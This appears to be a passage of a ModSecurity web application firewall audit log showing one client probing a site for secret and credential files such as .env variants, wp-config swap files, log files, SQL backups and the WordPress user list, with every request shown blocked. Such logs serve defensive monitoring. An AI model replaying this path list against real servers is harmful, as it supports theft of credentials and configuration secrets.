Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e84c93d-Z-- --f2282d0b-A-- [09/May/2025:02:12:47 +0700] aB0CL8P9GxxPAbCroFZCVQAAAEo 103.236.140.4 55298 103.236.140.4 8181 --f2282d0b-B-- GET /public/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f2282d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2282d0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731567214928 715 (- - -) Stopwatch2: 1746731567214928 715; combined=282, p1=245, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2282d0b-Z-- --8fd66a14-A-- [09/May/2025:02:12:47 +0700] aB0CL8P9GxxPAbCroFZCVwAAAFA 103.236.140.4 55302 103.236.140.4 8181 --8fd66a14-B-- GET /composer.json HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8fd66a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fd66a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/composer.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731567671765 677 (- - -) Stopwatch2: 1746731567671765 677; combined=262, p1=235, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fd66a14-Z-- --2f62e458-A-- [09/May/2025:02:12:47 +0700] aB0CL8P9GxxPAbCroFZCWAAAAFY 103.236.140.4 55304 103.236.140.4 8181 --2f62e458-B-- GET /api/v1/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2f62e458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f62e458-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731567994845 689 (- - -) Stopwatch2: 1746731567994845 689; combined=272, p1=225, p2=0, p3=0, p4=0, p5=46, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f62e458-Z-- --9e135d3a-A-- [09/May/2025:02:12:48 +0700] aB0CMMP9GxxPAbCroFZCXAAAAFU 103.236.140.4 55316 103.236.140.4 8181 --9e135d3a-B-- GET /.env.example HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9e135d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e135d3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731568956355 672 (- - -) Stopwatch2: 1746731568956355 672; combined=257, p1=222, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e135d3a-Z-- --00410b3f-A-- [09/May/2025:02:12:49 +0700] aB0CMcP9GxxPAbCroFZCXQAAAFc 103.236.140.4 55318 103.236.140.4 8181 --00410b3f-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --00410b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00410b3f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731569120573 1710 (- - -) Stopwatch2: 1746731569120573 1710; combined=649, p1=314, p2=310, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00410b3f-Z-- --6debaf56-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCYgAAAEk 103.236.140.4 55328 103.236.140.4 8181 --6debaf56-B-- GET /.env.local HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6debaf56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6debaf56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731570129462 633 (- - -) Stopwatch2: 1746731570129462 633; combined=251, p1=217, p2=0, p3=0, p4=0, p5=34, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6debaf56-Z-- --8b9f2639-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCYwAAAEU 103.236.140.4 55330 103.236.140.4 8181 --8b9f2639-B-- GET /.env.dev HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8b9f2639-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b9f2639-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731570390938 681 (- - -) Stopwatch2: 1746731570390938 681; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b9f2639-Z-- --8fe0c248-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCZAAAAEY 103.236.140.4 55332 103.236.140.4 8181 --8fe0c248-B-- GET /.env.test HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8fe0c248-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fe0c248-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731570645738 654 (- - -) Stopwatch2: 1746731570645738 654; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fe0c248-Z-- --5f277a0f-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCZQAAAFg 103.236.140.4 55334 103.236.140.4 8181 --5f277a0f-B-- GET /var/logs/dev.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5f277a0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f277a0f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731570841318 1642 (- - -) Stopwatch2: 1746731570841318 1642; combined=696, p1=318, p2=352, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f277a0f-Z-- --5ebf6f2d-A-- [09/May/2025:02:12:51 +0700] aB0CM8P9GxxPAbCroFZCZgAAAEE 103.236.140.4 55336 103.236.140.4 8181 --5ebf6f2d-B-- GET /var/logs/prod.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5ebf6f2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ebf6f2d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731571010772 1532 (- - -) Stopwatch2: 1746731571010772 1532; combined=616, p1=307, p2=282, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ebf6f2d-Z-- --0b7bb648-A-- [09/May/2025:02:12:54 +0700] aB0CNsP9GxxPAbCroFZCagAAAFM 103.236.140.4 55352 103.236.140.4 8181 --0b7bb648-B-- GET /web.config HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0b7bb648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b7bb648-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731574372612 628 (- - -) Stopwatch2: 1746731574372612 628; combined=251, p1=217, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7bb648-Z-- --467e4f5f-A-- [09/May/2025:02:12:55 +0700] aB0CN8P9GxxPAbCroFZCbwAAAE0 103.236.140.4 55366 103.236.140.4 8181 --467e4f5f-B-- GET /app/etc/local.xml HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --467e4f5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --467e4f5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731575393501 647 (- - -) Stopwatch2: 1746731575393501 647; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --467e4f5f-Z-- --2ff67969-A-- [09/May/2025:02:12:55 +0700] aB0CN8P9GxxPAbCroFZCcQAAAE4 103.236.140.4 55370 103.236.140.4 8181 --2ff67969-B-- GET /var/log/system.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2ff67969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ff67969-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731575779154 1639 (- - -) Stopwatch2: 1746731575779154 1639; combined=721, p1=335, p2=359, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ff67969-Z-- --2026ee0a-A-- [09/May/2025:02:12:55 +0700] aB0CN8P9GxxPAbCroFZCcgAAAEg 103.236.140.4 55372 103.236.140.4 8181 --2026ee0a-B-- GET /var/log/exception.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2026ee0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2026ee0a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731575957434 1564 (- - -) Stopwatch2: 1746731575957434 1564; combined=683, p1=315, p2=340, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2026ee0a-Z-- --60782d43-A-- [09/May/2025:02:12:56 +0700] aB0COMP9GxxPAbCroFZCcwAAAFQ 103.236.140.4 55374 103.236.140.4 8181 --60782d43-B-- GET /.wp-config.php.swp HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --60782d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60782d43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731576122823 808 (- - -) Stopwatch2: 1746731576122823 808; combined=331, p1=276, p2=0, p3=0, p4=0, p5=55, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60782d43-Z-- --032bb779-A-- [09/May/2025:02:12:56 +0700] aB0COMP9GxxPAbCroFZCdQAAAEY 103.236.140.4 55378 103.236.140.4 8181 --032bb779-B-- GET /wp-content/debug.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --032bb779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --032bb779-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731576466423 2440 (- - -) Stopwatch2: 1746731576466423 2440; combined=884, p1=407, p2=448, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --032bb779-Z-- --d3610a6e-A-- [09/May/2025:02:12:56 +0700] aB0COMP9GxxPAbCroFZCdwAAAEA 103.236.140.4 55386 103.236.140.4 8181 --d3610a6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d3610a6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3610a6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||manage.bataranetwork.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731576859010 1947 (- - -) Stopwatch2: 1746731576859010 1947; combined=1021, p1=347, p2=648, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3610a6e-Z-- --a6f06b44-A-- [09/May/2025:02:13:03 +0700] aB0CP8P9GxxPAbCroFZChgAAAEA 103.236.140.4 55454 103.236.140.4 8181 --a6f06b44-B-- GET /backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a6f06b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6f06b44-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731583975851 1553 (- - -) Stopwatch2: 1746731583975851 1553; combined=630, p1=309, p2=295, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6f06b44-Z-- --66bc8a5a-A-- [09/May/2025:02:13:04 +0700] aB0CQMP9GxxPAbCroFZChwAAAEo 103.236.140.4 55460 103.236.140.4 8181 --66bc8a5a-B-- GET /db_backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --66bc8a5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66bc8a5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 